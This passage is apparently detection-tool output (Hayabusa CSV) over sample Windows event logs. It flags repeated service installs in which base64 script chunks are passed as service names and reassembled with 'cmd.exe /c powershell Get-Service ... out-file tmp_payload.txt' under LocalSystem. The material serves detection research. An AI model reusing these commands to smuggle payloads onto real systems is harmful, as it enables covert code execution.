execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 17:17:51.015 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: VkIC1lcSAidHJ1ZSJ9IC1Qcm9wZXJ0aWVzIE9wZXJhdGluZ1N5c3RlbSB8IFNlbGVjdCANCiAgICAgICAgICAgICAgICANCiAgICAgICAgICAgICAgICAjJENvbXB1dGVyTGlzdCA9ICRHZXRBRENv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg108"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:51.015 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: VkIC1lcSAidHJ1ZSJ9IC1Qcm9wZXJ0aWVzIE9wZXJhdGluZ1N5c3RlbSB8IFNlbGVjdCANCiAgICAgICAgICAgICAgICANCiAgICAgICAgICAgICAgICAjJENvbXB1dGVyTGlzdCA9ICRHZXRBRENv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg108"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:51.015 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: VkIC1lcSAidHJ1ZSJ9IC1Qcm9wZXJ0aWVzIE9wZXJhdGluZ1N5c3RlbSB8IFNlbGVjdCANCiAgICAgICAgICAgICAgICANCiAgICAgICAgICAgICAgICAjJENvbXB1dGVyTGlzdCA9ICRHZXRBRENv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg108"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service 
execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:52.463 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: bXB1dGVyTGlzdC5ETlNIb3N0TmFtZQ0KDQoNCiAgICAgICAgICAgICAgICAkT1MgPSAoJEdldEFEQ29tcHV0ZXJMaXN0IC1tYXRjaCAkQ29tcHV0ZXIpLk9wZXJhdGluZ1N5c3RlbQ0KICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg109"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:52.463 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: bXB1dGVyTGlzdC5ETlNIb3N0TmFtZQ0KDQoNCiAgICAgICAgICAgICAgICAkT1MgPSAoJEdldEFEQ29tcHV0ZXJMaXN0IC1tYXRjaCAkQ29tcHV0ZXIpLk9wZXJhdGluZ1N5c3RlbQ0KICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg109"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:52.463 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: bXB1dGVyTGlzdC5ETlNIb3N0TmFtZQ0KDQoNCiAgICAgICAgICAgICAgICAkT1MgPSAoJEdldEFEQ29tcHV0ZXJMaXN0IC1tYXRjaCAkQ29tcHV0ZXIpLk9wZXJhdGluZ1N5c3RlbQ0KICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg109"" | select -Expand DisplayName |out-file -append 
tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:53.917 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cgIiRPUyINCiAgICAgICAgICAgIH0gDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg110"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:53.917 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AgICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cgIiRPUyINCiAgICAgICAgICAgIH0gDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg110"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:53.917 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cgIiRPUyINCiAgICAgICAgICAgIH0gDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg110"" | select 
-Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:55.362 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgICAgICAgICAgICAgICANCiAgICAgICAgICAgIA0KICAgICAgICAgICAgIyBSZXRyaWV2ZSB0aGUgQXBwbGljYXRpb24gRXZlbnQgbG9nIGluZm8NCiAgICAgICAgICAgICRBcHBsaWNhdGlvbk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg111"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:55.362 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ICAgICAgICAgICAgICAgICANCiAgICAgICAgICAgIA0KICAgICAgICAgICAgIyBSZXRyaWV2ZSB0aGUgQXBwbGljYXRpb24gRXZlbnQgbG9nIGluZm8NCiAgICAgICAgICAgICRBcHBsaWNhdGlvbk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg111"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:55.362 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgICAgICAgICAgICAgICANCiAgICAgICAgICAgIA0KICAgICAgICAgICAgIyBSZXRyaWV2ZSB0aGUgQXBwbGljYXRpb24gRXZlbnQgbG9nIGluZm8NCiAgICAgICAgICAgICRBcHBsaWNhdGlvbk | Path: c:\windows\system32\cmd.exe /c powershell -command 
""Get-Service ""seg111"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:56.815 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: luZm8gPSBHZXQtRXZlbnRMb2dJbmZvICRDb21wdXRlciBBcHBsaWNhdGlvbiAkUmVtb3RlQ29tcHV0ZXIgJE9TDQogICAgICAgICAgICAkQXBwbGljYXRpb25FUFMgPSAkQXBwbGljYXRpb25JbmZv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg112"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:56.815 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: luZm8gPSBHZXQtRXZlbnRMb2dJbmZvICRDb21wdXRlciBBcHBsaWNhdGlvbiAkUmVtb3RlQ29tcHV0ZXIgJE9TDQogICAgICAgICAgICAkQXBwbGljYXRpb25FUFMgPSAkQXBwbGljYXRpb25JbmZv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg112"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:56.815 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: luZm8gPSBHZXQtRXZlbnRMb2dJbmZvICRDb21wdXRlciBBcHBsaWNhdGlvbiAkUmVtb3RlQ29tcHV0ZXIgJE9TDQogICAgICAgICAgICAkQXBwbGljYXRpb25FUFMgPSAkQXBwbGljYXRpb25JbmZv | Path: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg112"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:58.263 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: LkF2ZXJhZ2VFdmVudHMNCiAgICAgICAgICAgICRBcHBsaWNhdGlvbkZpcnN0RXZlbnRUaW1lID0gJEFwcGxpY2F0aW9uSW5mby5TdGFydFRpbWUNCiAgICAgICAgICAgICRBcHBsaWNhdGlvbkxhc3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg113"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:58.263 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: LkF2ZXJhZ2VFdmVudHMNCiAgICAgICAgICAgICRBcHBsaWNhdGlvbkZpcnN0RXZlbnRUaW1lID0gJEFwcGxpY2F0aW9uSW5mby5TdGFydFRpbWUNCiAgICAgICAgICAgICRBcHBsaWNhdGlvbkxhc3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg113"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:58.263 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 
LkF2ZXJhZ2VFdmVudHMNCiAgICAgICAgICAgICRBcHBsaWNhdGlvbkZpcnN0RXZlbnRUaW1lID0gJEFwcGxpY2F0aW9uSW5mby5TdGFydFRpbWUNCiAgICAgICAgICAgICRBcHBsaWNhdGlvbkxhc3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg113"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:59.742 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: RFdmVudFRpbWUgPSAkQXBwbGljYXRpb25JbmZvLkVuZFRpbWUNCiAgICAgICAgICAgICRBcHBsaWNhdGlvblRvdGFsRXZlbnRzID0gJEFwcGxpY2F0aW9uSW5mby5Ub3RhbEV2ZW50cw0KICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg114"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:59.742 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: RFdmVudFRpbWUgPSAkQXBwbGljYXRpb25JbmZvLkVuZFRpbWUNCiAgICAgICAgICAgICRBcHBsaWNhdGlvblRvdGFsRXZlbnRzID0gJEFwcGxpY2F0aW9uSW5mby5Ub3RhbEV2ZW50cw0KICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg114"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:59.742 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious 
Service Possibly Installed,"Svc: RFdmVudFRpbWUgPSAkQXBwbGljYXRpb25JbmZvLkVuZFRpbWUNCiAgICAgICAgICAgICRBcHBsaWNhdGlvblRvdGFsRXZlbnRzID0gJEFwcGxpY2F0aW9uSW5mby5Ub3RhbEV2ZW50cw0KICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg114"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:01.196 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgICAgJEFwcGxpY2F0aW9uRXZlbnRMb2dTaXplID0gJEFwcGxpY2F0aW9uSW5mby5Mb2dTaXplDQogICAgICAgICAgICANCg0KICAgICAgICAgICAgIyBSZXRyaWV2ZSB0aGUgU2VjdXJpdHkgRX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg115"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:01.196 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ICAgICAgJEFwcGxpY2F0aW9uRXZlbnRMb2dTaXplID0gJEFwcGxpY2F0aW9uSW5mby5Mb2dTaXplDQogICAgICAgICAgICANCg0KICAgICAgICAgICAgIyBSZXRyaWV2ZSB0aGUgU2VjdXJpdHkgRX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg115"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:01.196 
+09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgICAgJEFwcGxpY2F0aW9uRXZlbnRMb2dTaXplID0gJEFwcGxpY2F0aW9uSW5mby5Mb2dTaXplDQogICAgICAgICAgICANCg0KICAgICAgICAgICAgIyBSZXRyaWV2ZSB0aGUgU2VjdXJpdHkgRX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg115"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:02.650 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZlbnQgbG9nIGluZm8NCiAgICAgICAgICAgICRTZWN1cml0eUluZm8gPSBHZXQtRXZlbnRMb2dJbmZvICRDb21wdXRlciBTZWN1cml0eSAkUmVtb3RlQ29tcHV0ZXIgJE9TDQogICAgICAgICAgICAk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg116"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:02.650 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ZlbnQgbG9nIGluZm8NCiAgICAgICAgICAgICRTZWN1cml0eUluZm8gPSBHZXQtRXZlbnRMb2dJbmZvICRDb21wdXRlciBTZWN1cml0eSAkUmVtb3RlQ29tcHV0ZXIgJE9TDQogICAgICAgICAgICAk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg116"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 17:18:02.650 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZlbnQgbG9nIGluZm8NCiAgICAgICAgICAgICRTZWN1cml0eUluZm8gPSBHZXQtRXZlbnRMb2dJbmZvICRDb21wdXRlciBTZWN1cml0eSAkUmVtb3RlQ29tcHV0ZXIgJE9TDQogICAgICAgICAgICAk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg116"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:04.105 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: U2VjdXJpdHlFUFMgPSAkU2VjdXJpdHlJbmZvLkF2ZXJhZ2VFdmVudHMNCiAgICAgICAgICAgICRTZWN1cml0eUZpcnN0RXZlbnRUaW1lID0gJFNlY3VyaXR5SW5mby5TdGFydFRpbWUNCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg117"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:04.105 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: U2VjdXJpdHlFUFMgPSAkU2VjdXJpdHlJbmZvLkF2ZXJhZ2VFdmVudHMNCiAgICAgICAgICAgICRTZWN1cml0eUZpcnN0RXZlbnRUaW1lID0gJFNlY3VyaXR5SW5mby5TdGFydFRpbWUNCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg117"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service 
execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:04.105 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: U2VjdXJpdHlFUFMgPSAkU2VjdXJpdHlJbmZvLkF2ZXJhZ2VFdmVudHMNCiAgICAgICAgICAgICRTZWN1cml0eUZpcnN0RXZlbnRUaW1lID0gJFNlY3VyaXR5SW5mby5TdGFydFRpbWUNCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg117"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:05.542 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICRTZWN1cml0eUxhc3RFdmVudFRpbWUgPSAkU2VjdXJpdHlJbmZvLkVuZFRpbWUNCiAgICAgICAgICAgICRTZWN1cml0eVRvdGFsRXZlbnRzID0gJFNlY3VyaXR5SW5mby5Ub3RhbEV2ZW50 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg118"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:05.542 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AgICAgICRTZWN1cml0eUxhc3RFdmVudFRpbWUgPSAkU2VjdXJpdHlJbmZvLkVuZFRpbWUNCiAgICAgICAgICAgICRTZWN1cml0eVRvdGFsRXZlbnRzID0gJFNlY3VyaXR5SW5mby5Ub3RhbEV2ZW50 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg118"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand 
start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:05.542 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICRTZWN1cml0eUxhc3RFdmVudFRpbWUgPSAkU2VjdXJpdHlJbmZvLkVuZFRpbWUNCiAgICAgICAgICAgICRTZWN1cml0eVRvdGFsRXZlbnRzID0gJFNlY3VyaXR5SW5mby5Ub3RhbEV2ZW50 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg118"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:06.982 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: cw0KICAgICAgICAgICAgJFNlY3VyaXR5RXZlbnRMb2dTaXplID0gJFNlY3VyaXR5SW5mby5Mb2dTaXplDQogICAgICAgICAgICANCg0KICAgICAgICAgICAgIyBSZXRyaWV2ZSB0aGUgU3lzdGVtIE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg119"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:06.982 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: cw0KICAgICAgICAgICAgJFNlY3VyaXR5RXZlbnRMb2dTaXplID0gJFNlY3VyaXR5SW5mby5Mb2dTaXplDQogICAgICAgICAgICANCg0KICAgICAgICAgICAgIyBSZXRyaWV2ZSB0aGUgU3lzdGVtIE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg119"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: 
LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:06.982 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: cw0KICAgICAgICAgICAgJFNlY3VyaXR5RXZlbnRMb2dTaXplID0gJFNlY3VyaXR5SW5mby5Mb2dTaXplDQogICAgICAgICAgICANCg0KICAgICAgICAgICAgIyBSZXRyaWV2ZSB0aGUgU3lzdGVtIE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg119"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:08.440 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: V2ZW50IGxvZyBpbmZvDQogICAgICAgICAgICAkU3lzdGVtSW5mbyA9IEdldC1FdmVudExvZ0luZm8gJENvbXB1dGVyIFN5c3RlbSAkUmVtb3RlQ29tcHV0ZXIgJE9TDQogICAgICAgICAgICAkU3lz | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg120"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:08.440 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 